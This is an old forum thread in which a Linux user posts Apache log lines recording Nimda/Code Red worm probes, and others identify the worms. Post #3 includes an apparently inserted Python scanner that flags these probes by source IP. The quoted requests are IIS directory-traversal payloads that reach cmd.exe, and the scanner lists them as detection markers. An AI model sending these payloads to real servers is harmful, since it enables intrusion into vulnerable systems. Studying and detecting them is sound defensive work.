/var/log/httpd/access_log | Unix Linux Forums | Security



Security Discuss UNIX and Linux computer and network security, cyber security, cyber attacks, IT security, and more.

/var/log/httpd/access_log

Security


    #1  
Old 10-01-2001
eddie
Registered User
 
Join Date: Aug 2001
Last Activity: 25 December 2002, 9:33 PM EST
Location: Ontario, Canada
Posts: 20
Thanks: 0
Thanked 0 Times in 0 Posts
/var/log/httpd/access_log

Yesterday I happened to check /var/log/httpd/access_log and found some funny things like these,

209.127.62.159 - - [30/Sep/2001:21:23:09 -0400] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 210
209.127.62.159 - - [30/Sep/2001:21:23:10 -0400] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 208
209.127.62.159 - - [30/Sep/2001:21:23:11 -0400] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 218
209.127.62.159 - - [30/Sep/2001:21:23:11 -0400] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 218
209.127.62.159 - - [30/Sep/2001:21:23:12 -0400] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 232
209.127.62.159 - - [30/Sep/2001:21:23:13 -0400] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 249
209.127.62.159 - - [30/Sep/2001:21:23:13 -0400] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 249
209.127.62.159 - - [30/Sep/2001:21:23:14 -0400] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 265

Obviously, the access treated my machine like NT/IIS. As we can see from the log, it was trying harder and harder. If I had not shut down port 80, it would have created hundreds of lines in the log file. I also checked the logs of the past 3 months; there are about 200 tries of this kind from various ranges of IP addresses.

I think this is apparently a virus attack. Has anybody here ever found such a log? I just dialed up to the Internet, the connection lasted for about 30 minutes, and I got this attack. I'll keep my httpd closed. Thank God my system is Linux, not NT.

Last edited by eddie; 10-01-2001 at 06:50 PM..
    #2  
Old 10-01-2001
Neo, Forum Staff
Administrator
 
Join Date: Sep 2000
Last Activity: 30 October 2014, 12:26 PM EDT
Location: Asia pacific region
Posts: 13,023
Thanks: 522
Thanked 877 Times in 402 Posts
This is like the Nimda virus, or a variant of it. The world has been getting hammered by it for some time. However, since we are !NT, no problem, just an annoyance.

This link might be interesting to read:

http://www.net-security.org/text/pre...9,63447,.shtml

This is also a good link:

http://www.sophos.com/virusinfo/analyses/w32nimdaa.html
    #3  
Old 10-01-2001
loadc
Registered User
 
Join Date: Sep 2001
Last Activity: 16 December 2002, 4:51 PM EST
Posts: 40
Thanks: 0
Thanked 0 Times in 0 Posts
Nimda@home, the search for intelligence on the internet

If you've got some spare processor lying around and the bandwidth to go with it, there are some scripts out there that will scan your logs, take the IPs of the infected scanners, resolve them, and then send off a mail to their ISP or whoever, informing them of the machine's condition...

loadc
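The two things the thread describes, recognising the IIS-worm probe lines eddie quoted and, as loadc suggests, pulling out the source IPs of the infected hosts that sent them, can be done with a short log scanner. The script below is an added example for this thread, not code from any poster or from the scripts loadc refers to. It parses Apache common log format, flags requests carrying the markers visible in the post (root.exe, cmd.exe, the double-encoded `%255c` and overlong-UTF-8 `%c1%1c` traversals), and groups hits per source IP with first/last timestamp. The `default.ida` marker is an assumption taken from public Code Red write-ups, not from the post; the sample input reuses eddie's eight lines plus two constructed benign requests from the 192.0.2.0/24 documentation range. It only reads and summarises; resolving addresses or mailing anyone is left out.

```python
"""Summarise IIS-worm probes (Nimda / Code Red style) found in an Apache access_log.

Added example for this thread; not any poster's code. Read-only: it never
resolves or contacts the scanning hosts.
"""
import re
from dataclasses import dataclass, field
from typing import Dict, Iterable, List, Optional

# Apache "common" log format: host ident authuser [date] "request" status bytes
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+)(?: (?P<proto>[^"]*))?" '
    r'(?P<status>\d{3}) (?P<size>\S+)$'
)

# Request fragments that identify the probe family. The first four are taken
# straight from the log lines in the post; they target IIS, so on Apache they
# only ever yield 404s, but they still tell you which hosts are infected.
PROBE_MARKERS = (
    "root.exe",     # copy of cmd.exe left behind by Code Red II, reused by Nimda
    "cmd.exe",      # direct traversal to the NT command shell
    "%255c",        # double-URL-encoded backslash: ..%255c../
    "%c1%1c",       # overlong UTF-8 encoding of "\" (the "unicode" traversal)
    "default.ida",  # Code Red's .ida probe; assumption, not in the post's log
)


@dataclass
class Scanner:
    """What one probing source IP did to us."""
    count: int = 0
    first: str = ""
    last: str = ""
    paths: List[str] = field(default_factory=list)


def parse(line: str) -> Optional[Dict[str, str]]:
    """Return the fields of one common-log-format line, or None if malformed."""
    m = LOG_RE.match(line.strip())
    return m.groupdict() if m else None


def is_probe(path: str) -> bool:
    """True when the request path (query string included) carries a worm marker."""
    p = path.lower()
    return any(marker in p for marker in PROBE_MARKERS)


def summarize(lines: Iterable[str]) -> Dict[str, Scanner]:
    """Group probe requests by source IP, keeping count, first/last time and paths."""
    hits: Dict[str, Scanner] = {}
    for line in lines:
        rec = parse(line)
        if rec is None or not is_probe(rec["path"]):
            continue  # malformed line or ordinary traffic: ignore
        entry = hits.setdefault(rec["ip"], Scanner(first=rec["time"]))
        entry.count += 1
        entry.last = rec["time"]
        entry.paths.append(rec["path"])
    return hits


def report(lines: Iterable[str]) -> List[str]:
    """One text line per scanning host, busiest first (e.g. to mail to yourself)."""
    rows = []
    for ip, s in sorted(summarize(lines).items(), key=lambda kv: -kv[1].count):
        rows.append(f"{ip}  {s.count} probes  {s.first} .. {s.last}")
    return rows


# The first eight lines are the ones quoted in the post; the last two are
# constructed benign requests (192.0.2.0/24 is a documentation range) to show
# that normal traffic is not reported.
SAMPLE_LOG = """\
209.127.62.159 - - [30/Sep/2001:21:23:09 -0400] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 210
209.127.62.159 - - [30/Sep/2001:21:23:10 -0400] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 208
209.127.62.159 - - [30/Sep/2001:21:23:11 -0400] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 218
209.127.62.159 - - [30/Sep/2001:21:23:11 -0400] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 218
209.127.62.159 - - [30/Sep/2001:21:23:12 -0400] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 232
209.127.62.159 - - [30/Sep/2001:21:23:13 -0400] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 249
209.127.62.159 - - [30/Sep/2001:21:23:13 -0400] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 249
209.127.62.159 - - [30/Sep/2001:21:23:14 -0400] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 265
192.0.2.10 - - [30/Sep/2001:21:30:00 -0400] "GET /index.html HTTP/1.0" 200 1043
192.0.2.11 - - [30/Sep/2001:21:31:02 -0400] "GET /images/logo.gif HTTP/1.0" 200 2310
"""

if __name__ == "__main__":
    # Real use: report(open("/var/log/httpd/access_log"))
    for row in report(SAMPLE_LOG.splitlines()):
        print(row)
```

Run it against the sample and the only host reported is 209.127.62.159 with 8 probes in a five-second window, which is the "trying harder and harder" pattern eddie noticed; the 404 status on every hit confirms the Linux box simply has nothing at those paths. Feeding it the real access_log (see the comment in the block) gives the per-IP list loadc talks about, from which the distinct sources over a period can be counted without any outbound lookups.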
    #4  
Old 10-02-2001
LivinFree, Forum Advisor
Goober Extraordinaire
 
Join Date: Jul 2001
Last Activity: 16 June 2011, 4:50 PM EDT
Location: Portland, OR, USA
Posts: 1,626
Thanks: 2
Thanked 15 Times in 13 Posts
Yeah, those logs could be not only Nimda, but a "Code Red" variant, or somebody scanning like heck trying to break into a server that Code Red already rooted. If they're from similar (or the same) IP addresses, it's most likely somebody in your subnet that's affected - I think Nimda only scans the 16 addresses above and below theirs (I may be confusing this with another worm, though).